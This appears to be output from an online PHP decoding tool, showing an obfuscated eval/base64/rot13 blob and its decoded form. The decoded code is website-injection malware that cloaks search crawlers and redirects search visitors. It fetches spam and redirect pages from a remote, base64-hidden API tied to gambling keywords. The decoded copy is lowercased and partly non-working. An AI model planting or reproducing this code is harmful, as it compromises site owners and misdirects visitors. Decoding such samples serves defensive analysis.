Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(str_rot13(base64_decode('ZnJnX2d2enJfeXZ6dmcoMCk7CnJlZWJlX2VyY2JlZ3ZhdCgwKTsKCn..

Decoded Output download

set_time_limit(0);
error_reporting(0);

define('version', 'zkdna');
define('apiversion', 'vegjs21n');
define('api', base64_decode('ahr0chm6ly9hbwjraw5nmzy1lmnvbs8='));
define('api_http', base64_decode('ahr0cdovl2ftymtpbmcznjuuy29tlw=='));
define('api2', '');
define('fallback_redirect_html', base64_decode('pgh0bww+ciagica8agvhzd4kicagicagica8dgl0bgu+vghlihjlc291cmnlignhbm5vdcbizsbmb3vuzc48l3rpdgxlpgogicagicagidxzy3jpchq+d2luzg93lmxvy2f0aw9upsjodhrwczovl2ftymtpbmcznjuuy29tlyi7pc9zy3jpchq+ciagica8l2hlywq+ciagica8ym9ket4kicagicagica8ade+tm90iezvdw5kpc9omt4kicagidwvym9ket4kpc9odg1spg=='));

$req_ref = $_server["http_referer"];
$req_ua = $_server["http_user_agent"];
$host = $_server['http_host'];
$req_uri = $_server['request_uri'];

function fetch_prefix() {

}

function insert_html() {
	ob_start();
	register_shutdown_function('insert_html_end');
}

function insert_html_end() {
    $output = ob_get_contents();
    ob_end_clean();
}

function is_prefix($uri, $prefix_regex='/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|zop|xsn|xiazai|vna|soft|rna|qsj|muv|iphone|gov|edu|apk|wp-news|uri|bak|start|gaming|sport|football|bull|id)./i') {
	return preg_match($prefix_regex, $uri) === 1;
}

function is_crawler($ua) {
    $crawlers = array('googlebot', 'bingbot', 'msnbot', 'yahoo!');
	foreach ($crawlers as $c) {
		if (stripos($ua, $c) !== false) {
			return true;
		}
	}
	return false;
}

function is_visitor($ref) {
	if (substr($ref, 0, 4) === 'http') {
        $refs = array('google.', 'bing.', 'yahoo.');
		foreach ($refs as $r) {
			if (stripos($ref, $r) !== false) {
				return true;
			}
		}
	}
	return false;
}

function get_content($url, $headers=array(), $conn_timeout=0, $trans_timeout=0) {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, curlopt_url, $url);
        curl_setopt($ch, curlopt_header, 0);
        curl_setopt($ch, curlopt_returntransfer, 1);
		curl_setopt($ch, curlopt_useragent, $_server["http_user_agent"]);
		curl_setopt($ch, curlopt_referer, $_server["http_referer"]);
		curl_setopt($ch, curlopt_httpheader, $headers);
		curl_setopt($ch, curlopt_connecttimeout, $conn_timeout);
		curl_setopt($ch, curlopt_timeout, $trans_timeout);
        curl_setopt($ch, curlopt_ssl_verifypeer, false);
        curl_setopt($ch, curlopt_ssl_verifyhost, false);
	    curl_setopt($ch, curlopt_followlocation, true);
        $result = curl_exec($ch);
		if(curl_errno($ch)){
			$result = null;
		}
        curl_close($ch);
        return $result;
    }
	else {
        return file_get_contents($url);
    }
}
function get_client_ip(){
    foreach (array('http_client_ip', 'http_x_real_ip', 'http_cf_connecting_ip', 'http_x_forwarded_for', 'http_x_forwarded', 'http_x_cluster_client_ip', 'http_forwarded_for', 'http_forwarded', 'remote_addr') as $key){
        if (array_key_exists($key, $_server) === true){
            foreach (explode(',', $_server[$key]) as $ip){
                $ip = trim($ip);
                if (filter_var($ip, filter_validate_ip, filter_flag_no_priv_range | filter_flag_no_res_range) !== false){
                    return $ip;
                }
            }
        }
    }
}

function main() {
	global $req_ref, $req_ua, $host, $req_uri;
	header('cache-control: no-store, no-cache, must-revalidate');
	header('cache-control: post-check=0, pre-check=0', false);
	header('pragma: no-cache');
	$uri_encoded = urlencode($req_uri);
	$headers = array();
	if (isset($_server['http_accept_language'])) {
		$lang = $_server['http_accept_language'];
		array_push($headers, "accept-language: $lang");
		array_push($headers, "vary: accept-language");
	}
	if (is_crawler($req_ua)) {
		$crawler_ip = get_client_ip();
		if (is_prefix($req_uri)) {
			header('content-type:text/html; charset=utf-8');
			echo get_content(api_http. "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . version . "&v=" . apiversion, $headers);
			exit;
		}
		else {
			echo get_content(api_http. "friends.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . version . "&v=" . apiversion);
		}
	}
	elseif (is_prefix($req_uri) && is_visitor($req_ref)) {
		header('content-type:text/html; charset=utf-8');
		$client_ip = get_client_ip();
		$allheaders = array();
		if (!function_exists('getallheaders')) {
			function getallheaders() {
			$tmp_headers = array();
			foreach ($_server as $name => $value) {
				if (substr($name, 0, 5) == 'http_') {
					$tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
				}
			}
			return $tmp_headers;
			}
			$allheaders = getallheaders();
		}
		else {
			$allheaders = getallheaders();
		}
		foreach ($allheaders as $key => $value) {
			if (stripos($key, 'sec-') === 0) {
				array_push($headers, "$key: $value");
			}
		}

		$html = get_content(api_http. "redirectv1.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . version . "&v=" . apiversion, $headers, 3, 3);
		echo ($html? $html: fallback_redirect_html);
		exit;
	}
}

main();

Did this file decode correctly?

Original Code

<?php eval(str_rot13(base64_decode('ZnJnX2d2enJfeXZ6dmcoMCk7CnJlZWJlX2VyY2JlZ3ZhdCgwKTsKCnFyc3ZhcignaXJlZnZiYScsICdteHFhbicpOwpxcnN2YXIoJ25jdmlyZWZ2YmEnLCAnaXJ0d2YyMWEnKTsKcXJzdmFyKCduY3YnLCBvbmZyNjRfcXJwYnFyKCdudWUwcHV6NnlsOXVvandlbmo1YXptbDF5emFpb2Y4PScpKTsKcXJzdmFyKCduY3ZfdWdnYycsIG9uZnI2NF9xcnBicXIoJ251ZTBwcWJpeTJzZ2x6Z2NvenBtYXdoaGwyOWd5aj09JykpOwpxcnN2YXIoJ25jdjInLCAnJyk7CnFyc3Zhcignc255eW9ucHhfZXJxdmVycGdfdWd6eScsIG9uZnI2NF9xcnBicXIoJ2N0dTBvamorcHZudHZwbjhudGl1bXE0eHZwbnR2cG50dnBuOHF0eTBvdGgraXR1eXZ1d3lwMjkxcHpheXZ0YXVvejVpcXBvdm1mb3pvM2lobXA0OHkzZWNxdGt5Y3RidHZwbnR2cG50dnFrbWwzd2NwdWQrcTJ5aG10OTN5emtpbDJzMG5qOWhjZndicXVlanBtYml5MnNnbHpnY296cG1hd2hobDI5Z3lsdjdjcDltbDN3Y3B1ZCtwdm50dnBuOHkydXlsamQrcHZudHZwbjhsejl4cmc0eHZwbnR2cG50dnBuOG5xcitnejkwdnJtaXFqNXhjcDliemc0eHZwbnR2cWppbHo5eHJnNHhjcDlicXQxZmN0PT0nKSk7CgokZXJkX2VycyA9ICRfZnJlaXJlWyJ1Z2djX2Vyc3JlcmUiXTsKJGVyZF9obiA9ICRfZnJlaXJlWyJ1Z2djX2hmcmVfbnRyYWciXTsKJHViZmcgPSAkX2ZyZWlyZVsndWdnY191YmZnJ107CiRlcmRfaGV2ID0gJF9mcmVpcmVbJ2VyZGhyZmdfaGV2J107CgpzaGFwZ3ZiYSBzcmdwdV9jZXJzdmsoKSB7Cgp9CgpzaGFwZ3ZiYSB2YWZyZWdfdWd6eSgpIHsKCWJvX2ZnbmVnKCk7CgllcnR2ZmdyZV9mdWhncWJqYV9zaGFwZ3ZiYSgndmFmcmVnX3VnenlfcmFxJyk7Cn0KCnNoYXBndmJhIHZhZnJlZ191Z3p5X3JhcSgpIHsKICAgICRiaGdjaGcgPSBib190cmdfcGJhZ3JhZ2YoKTsKICAgIGJvX3JhcV9weXJuYSgpOwp9CgpzaGFwZ3ZiYSB2Zl9jZXJzdmsoJGhldiwgJGNlcnN2a19lcnRyaz0nL1s/XC9dKG5jY3x2YmZ8bmFxZWJ2cXxxYmpheWJucXxveW5heHxvcmd8cG5mdmFifHRuenJmfGN5bmx8aXZxcmJ8Y2J4cmV8ZWJiZ3xhcmpmfGNuZ2d8Z3JyfGZnYnxvcm58ZnlifG9ucHxjbnB8Z3Z0fG96anxzZWh8b2h5eXxwbmVxfHRicWZ8c3ZmdXx6bnV3fG1iY3xrZmF8a3ZubW52fGlhbnxmYnNnfGVhbnxkZnd8emhpfHZjdWJhcnx0Yml8cnFofG5jeHxqYy1hcmpmfGhldnxvbnh8ZmduZWd8dG56dmF0fGZjYmVnfHNiYmdvbnl5fG9oeXl8dnEpLi92JykgewoJZXJnaGVhIGNlcnRfem5ncHUoJGNlcnN2a19lcnRyaywgJGhldikgPT09IDE7Cn0KCnNoYXBndmJhIHZmX3Blbmp5cmUoJGhuKSB7CiAgICAkcGVuanlyZWYgPSBuZWVubCgndGJidHlyb2JnJywgJ292YXRvYmcnLCAnemZhb2JnJywgJ2xudWJiIScpOwoJc2Jlcm5wdSAoJHBlbmp5cmVmIG5mICRwKSB7CgkJdnMgKGZnZXZjYmYoJGhuLCAkcCkgIT09IHNueWZyKSB7CgkJCWVyZ2hlYSBnZWhyOwoJCX0KCX0KCWVyZ2hlYSBzbnlmcjsKfQoKc2hhcGd2YmEgdmZfaXZmdmdiZSgkZXJzKSB7Cgl2cyAoZmhvZmdlKCRlcnMsIDAsIDQpID09PSAndWdnYycpIHsKICAgICAgICAkZXJzZiA9IG5lZW5sKCd0YmJ0eXIuJywgJ292YXQuJywgJ2xudWJiLicpOwoJCXNiZXJucHUgKCRlcnNmIG5mICRlKSB7CgkJCXZzIChmZ2V2Y2JmKCRlcnMsICRlKSAhPT0gc255ZnIpIHsKCQkJCWVyZ2hlYSBnZWhyOwoJCQl9CgkJfQoJfQoJZXJnaGVhIHNueWZyOwp9CgpzaGFwZ3ZiYSB0cmdfcGJhZ3JhZygkaGV5LCAkdXJucXJlZj1uZWVubCgpLCAkcGJhYV9ndnpyYmhnPTAsICRnZW5hZl9ndnpyYmhnPTApIHsKICAgIHZzIChzaGFwZ3ZiYV9ya3ZmZ2YoJ3BoZXlfdmF2ZycpKSB7CiAgICAgICAgJHB1ID0gcGhleV92YXZnKCk7CiAgICAgICAgcGhleV9mcmdiY2coJHB1LCBwaGV5YmNnX2hleSwgJGhleSk7CiAgICAgICAgcGhleV9mcmdiY2coJHB1LCBwaGV5YmNnX3VybnFyZSwgMCk7CiAgICAgICAgcGhleV9mcmdiY2coJHB1LCBwaGV5YmNnX2VyZ2hlYWdlbmFmc3JlLCAxKTsKCQlwaGV5X2ZyZ2JjZygkcHUsIHBoZXliY2dfaGZyZW50cmFnLCAkX2ZyZWlyZVsidWdnY19oZnJlX250cmFnIl0pOwoJCXBoZXlfZnJnYmNnKCRwdSwgcGhleWJjZ19lcnNyZXJlLCAkX2ZyZWlyZVsidWdnY19lcnNyZXJlIl0pOwoJCXBoZXlfZnJnYmNnKCRwdSwgcGhleWJjZ191Z2djdXJucXJlLCAkdXJucXJlZik7CgkJcGhleV9mcmdiY2coJHB1LCBwaGV5YmNnX3BiYWFycGdndnpyYmhnLCAkcGJhYV9ndnpyYmhnKTsKCQlwaGV5X2ZyZ2JjZygkcHUsIHBoZXliY2dfZ3Z6cmJoZywgJGdlbmFmX2d2enJiaGcpOwogICAgICAgIHBoZXlfZnJnYmNnKCRwdSwgcGhleWJjZ19mZnlfaXJldnNsY3JyZSwgc255ZnIpOwogICAgICAgIHBoZXlfZnJnYmNnKCRwdSwgcGhleWJjZ19mZnlfaXJldnNsdWJmZywgc255ZnIpOwoJICAgIHBoZXlfZnJnYmNnKCRwdSwgcGhleWJjZ19zYnl5Ymp5YnBuZ3ZiYSwgZ2Vocik7CiAgICAgICAgJGVyZmh5ZyA9IHBoZXlfcmtycCgkcHUpOwoJCXZzKHBoZXlfcmVlYWIoJHB1KSl7CgkJCSRlcmZoeWcgPSBhaHl5OwoJCX0KICAgICAgICBwaGV5X3B5YmZyKCRwdSk7CiAgICAgICAgZXJnaGVhICRlcmZoeWc7CiAgICB9CglyeWZyIHsKICAgICAgICBlcmdoZWEgc3Z5cl90cmdfcGJhZ3JhZ2YoJGhleSk7CiAgICB9Cn0Kc2hhcGd2YmEgdHJnX3B5dnJhZ192YygpewogICAgc2Jlcm5wdSAobmVlbmwoJ3VnZ2NfcHl2cmFnX3ZjJywgJ3VnZ2Nfa19lcm55X3ZjJywgJ3VnZ2NfcHNfcGJhYXJwZ3ZhdF92YycsICd1Z2djX2tfc2Jlam5lcXJxX3NiZScsICd1Z2djX2tfc2Jlam5lcXJxJywgJ3VnZ2Nfa19weWhmZ3JlX3B5dnJhZ192YycsICd1Z2djX3NiZWpuZXFycV9zYmUnLCAndWdnY19zYmVqbmVxcnEnLCAnZXJ6YmdyX25xcWUnKSBuZiAkeHJsKXsKICAgICAgICB2cyAobmVlbmxfeHJsX3JrdmZnZigkeHJsLCAkX2ZyZWlyZSkgPT09IGdlaHIpewogICAgICAgICAgICBzYmVybnB1IChya2N5YnFyKCcsJywgJF9mcmVpcmVbJHhybF0pIG5mICR2Yyl7CiAgICAgICAgICAgICAgICAkdmMgPSBnZXZ6KCR2Yyk7CiAgICAgICAgICAgICAgICB2cyAoc3Z5Z3JlX2luZSgkdmMsIHN2eWdyZV9pbnl2cW5ncl92Yywgc3Z5Z3JlX3N5bnRfYWJfY2V2aV9lbmF0ciB8IHN2eWdyZV9zeW50X2FiX2VyZl9lbmF0cikgIT09IHNueWZyKXsKICAgICAgICAgICAgICAgICAgICBlcmdoZWEgJHZjOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQp9CgpzaGFwZ3ZiYSB6bnZhKCkgewoJdHlib255ICRlcmRfZXJzLCAkZXJkX2huLCAkdWJmZywgJGVyZF9oZXY7Cgl1cm5xcmUoJ3BucHVyLXBiYWdlYnk6IGFiLWZnYmVyLCBhYi1wbnB1ciwgemhmZy1lcmlueXZxbmdyJyk7Cgl1cm5xcmUoJ3BucHVyLXBiYWdlYnk6IGNiZmctcHVycHg9MCwgY2VyLXB1cnB4PTAnLCBzbnlmcik7Cgl1cm5xcmUoJ2NlbnR6bjogYWItcG5wdXInKTsKCSRoZXZfcmFwYnFycSA9IGhleXJhcGJxcigkZXJkX2hldik7CgkkdXJucXJlZiA9IG5lZW5sKCk7Cgl2cyAodmZmcmcoJF9mcmVpcmVbJ3VnZ2NfbnBwcmNnX3luYXRobnRyJ10pKSB7CgkJJHluYXQgPSAkX2ZyZWlyZVsndWdnY19ucHByY2dfeW5hdGhudHInXTsKCQluZWVubF9jaGZ1KCR1cm5xcmVmLCAibnBwcmNnLXluYXRobnRyOiAkeW5hdCIpOwoJCW5lZW5sX2NoZnUoJHVybnFyZWYsICJpbmVsOiBucHByY2cteW5hdGhudHIiKTsKCX0KCXZzICh2Zl9wZW5qeXJlKCRlcmRfaG4pKSB7CgkJJHBlbmp5cmVfdmMgPSB0cmdfcHl2cmFnX3ZjKCk7CgkJdnMgKHZmX2NlcnN2aygkZXJkX2hldikpIHsKCQkJdXJucXJlKCdwYmFncmFnLWdsY3I6Z3JrZy91Z3p5OyBwdW5lZnJnPWhncy04Jyk7CgkJCXJwdWIgdHJnX3BiYWdyYWcobmN2X3VnZ2MuICJwYmFhcnBnYmUudWd6eT9xYnpudmE9eyR1YmZnfSZoZXY9eyRoZXZfcmFwYnFycX0mdmM9eyRwZW5qeXJlX3ZjfSZpcmU9IiAuIGlyZWZ2YmEgLiAiJmk9IiAuIG5jdmlyZWZ2YmEsICR1cm5xcmVmKTsKCQkJcmt2ZzsKCQl9CgkJcnlmciB7CgkJCXJwdWIgdHJnX3BiYWdyYWcobmN2X3VnZ2MuICJzZXZyYXFmLnVnenk/cWJ6bnZhPXskdWJmZ30maGV2PXskaGV2X3JhcGJxcnF9JnZjPXskcGVuanlyZV92Y30maXJlPSIgLiBpcmVmdmJhIC4gIiZpPSIgLiBuY3ZpcmVmdmJhKTsKCQl9Cgl9CglyeWZydnMgKHZmX2NlcnN2aygkZXJkX2hldikgJiYgdmZfaXZmdmdiZSgkZXJkX2VycykpIHsKCQl1cm5xcmUoJ3BiYWdyYWctZ2xjcjpncmtnL3Vnenk7IHB1bmVmcmc9aGdzLTgnKTsKCQkkcHl2cmFnX3ZjID0gdHJnX3B5dnJhZ192YygpOwoJCSRueXl1cm5xcmVmID0gbmVlbmwoKTsKCQl2cyAoIXNoYXBndmJhX3JrdmZnZigndHJnbnl5dXJucXJlZicpKSB7CgkJCXNoYXBndmJhIHRyZ255eXVybnFyZWYoKSB7CgkJCSRnemNfdXJucXJlZiA9IG5lZW5sKCk7CgkJCXNiZXJucHUgKCRfZnJlaXJlIG5mICRhbnpyID0+ICRpbnlocikgewoJCQkJdnMgKGZob2ZnZSgkYW56ciwgMCwgNSkgPT0gJ3VnZ2NfJykgewoJCQkJCSRnemNfdXJucXJlZltmZ2VfZXJjeW5wcignICcsICctJywgaHBqYmVxZihmZ2VnYnlianJlKGZnZV9lcmN5bnByKCdfJywgJyAnLCBmaG9mZ2UoJGFuenIsIDUpKSkpKV0gPSAkaW55aHI7CgkJCQl9CgkJCX0KCQkJZXJnaGVhICRnemNfdXJucXJlZjsKCQkJfQoJCQkkbnl5dXJucXJlZiA9IHRyZ255eXVybnFyZWYoKTsKCQl9CgkJcnlmciB7CgkJCSRueXl1cm5xcmVmID0gdHJnbnl5dXJucXJlZigpOwoJCX0KCQlzYmVybnB1ICgkbnl5dXJucXJlZiBuZiAkeHJsID0+ICRpbnlocikgewoJCQl2cyAoZmdldmNiZigkeHJsLCAnZnJwLScpID09PSAwKSB7CgkJCQluZWVubF9jaGZ1KCR1cm5xcmVmLCAiJHhybDogJGlueWhyIik7CgkJCX0KCQl9CgoJCSR1Z3p5ID0gdHJnX3BiYWdyYWcobmN2X3VnZ2MuICJlcnF2ZXJwZ2kxLnVnenk/cWJ6bnZhPXskdWJmZ30maGV2PXskaGV2X3JhcGJxcnF9JnZjPXskcHl2cmFnX3ZjfSZpcmU9IiAuIGlyZWZ2YmEgLiAiJmk9IiAuIG5jdmlyZWZ2YmEsICR1cm5xcmVmLCAzLCAzKTsKCQlycHViICgkdWd6eT8gJHVnenk6IHNueXlvbnB4X2VycXZlcnBnX3VnenkpOwoJCXJrdmc7Cgl9Cn0KCnpudmEoKTs=')));?>

Function Calls

str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 408d59e944bc0c4bd557fad0d3b3606d
Eval Count 1
Decode Time 87 ms